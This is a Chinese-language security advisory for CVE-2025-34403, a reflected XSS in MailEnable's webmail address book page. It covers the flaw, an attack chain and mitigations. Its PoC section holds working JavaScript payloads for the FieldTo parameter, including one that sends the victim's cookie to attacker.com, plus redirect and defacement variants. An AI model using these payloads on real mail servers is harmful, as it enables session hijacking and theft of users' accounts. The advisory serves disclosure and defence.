CVE-2025-34403 MailEnable AddressBook.aspx 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-34403

漏洞类型

反射型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

MailEnable

漏洞概述

CVE-2025-34403是MailEnable邮件服务器10.54之前版本中存在的一个反射型跨站脚本(XSS)漏洞。该漏洞位于Web邮件界面的地址簿功能页面(/Mondo/lang/sys/Forms/AddressBook.aspx)，攻击者可以通过构造恶意的FieldTo参数值来注入任意JavaScript代码。当受害者访问包含恶意payload的链接并尝试发送邮件时，攻击者的脚本将在受害者的浏览器上下文中执行，可能导致会话劫持、凭据窃取、恶意重定向或冒充用户执行操作等严重后果。由于该漏洞不需要认证即可利用，且攻击复杂度较低，因此存在被大规模扫描和利用的风险。

技术细节

该漏洞的根本原因在于AddressBook.aspx页面中的FieldTo参数未经充分输入验证和输出编码即被直接反射到页面中。具体来说，用户通过GET请求提交的FieldTo参数值会被直接嵌入到页面HTML源代码的JavaScript变量var fieldTo中。由于该值未进行适当的HTML实体编码或JavaScript转义，攻击者可以构造包含特殊字符和脚本标签的payload来突破当前的JavaScript上下文。攻击payload通常包含三个关键部分：首先是用于终止当前Finish()函数的代码，其次是注入攻击者可控的恶意JavaScript代码，最后是使用注释符(如//)来屏蔽后续可能存在的防御性代码。当受害者访问该恶意链接并触发相关用户交互(如点击发送按钮)时，恶意脚本将以受害者的身份在浏览器中执行，从而实现对用户会话的劫持或其他恶意操作。

攻击链分析

STEP 1

步骤1

攻击者侦察目标：识别使用MailEnable邮件服务器且版本低于10.54的目标系统

STEP 2

步骤2

构造恶意payload：创建包含XSS攻击代码的FieldTo参数值，用于终止页面原有的Finish()函数并注入恶意JavaScript

STEP 3

步骤3

分发钓鱼链接：通过电子邮件、社交工程或其他渠道诱导受害者点击构造好的恶意URL

STEP 4

步骤4

触发漏洞利用：当受害者访问恶意链接并尝试在Web邮件界面执行发送邮件等操作时，注入的JavaScript代码被执行

STEP 5

步骤5

实现攻击目的：攻击者通过成功执行的JavaScript可窃取用户会话cookie、重定向受害者到钓鱼网站、篡改页面内容或冒充用户执行操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-34403 PoC - MailEnable Reflected XSS in FieldTo parameter
// Target: /Mondo/lang/sys/Forms/AddressBook.aspx
// Payload terminates Finish() function and executes attacker JavaScript

const targetUrl = 'http://<target>/Mondo/lang/sys/Forms/AddressBook.aspx';
const maliciousPayload = '1;}});alert(document.domain);function%20Finish(){//';
const pocUrl = `${targetUrl}?FieldTo=${encodeURIComponent(maliciousPayload)}`;

console.log('[+] CVE-2025-34403 PoC Generator');
console.log('[+] Target:', targetUrl);
console.log('[+] Malicious URL:', pocUrl);
console.log('[+] Payload will terminate Finish() and execute alert(document.domain)');
console.log('\n[*] Attack Scenario:');
console.log('1. Attacker crafts malicious URL with XSS payload in FieldTo parameter');
console.log('2. Attacker tricks victim into clicking the link (e.g., via phishing email)');
console.log('3. When victim attempts to send email, the injected JavaScript executes');
console.log('4. Attacker can steal cookies, redirect user, or perform actions as victim');

// Example attack payload variants:
const attackPayloads = [
    '1;}});fetch("https://attacker.com/steal?c="+document.cookie);function%20Finish(){//',
    '1;}});window.location="https://malicious-site.com";function%20Finish(){//',
    '1;}});document.body.innerHTML="<h1>Pwned</h1>";function%20Finish(){//'
];

console.log('\n[*] Additional Attack Payloads:');
attackPayloads.forEach((p, i) => {
    console.log(`${i+1}. ${targetUrl}?FieldTo=${encodeURIComponent(p)}`);
});

影响范围

MailEnable < 10.54

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1)在前端代理或WAF上部署XSS过滤规则，对FieldTo参数中的特殊字符(<、>、"、'、;、)等进行过滤；2)禁用或限制AddressBook.aspx页面的访问；3)提醒用户不要点击来源不明的链接，尤其是包含可疑参数的链接；4)监控Web服务器日志，排查异常的FieldTo参数请求；5)考虑临时启用Web应用的XSS防护模块(如ModSecurity规则)。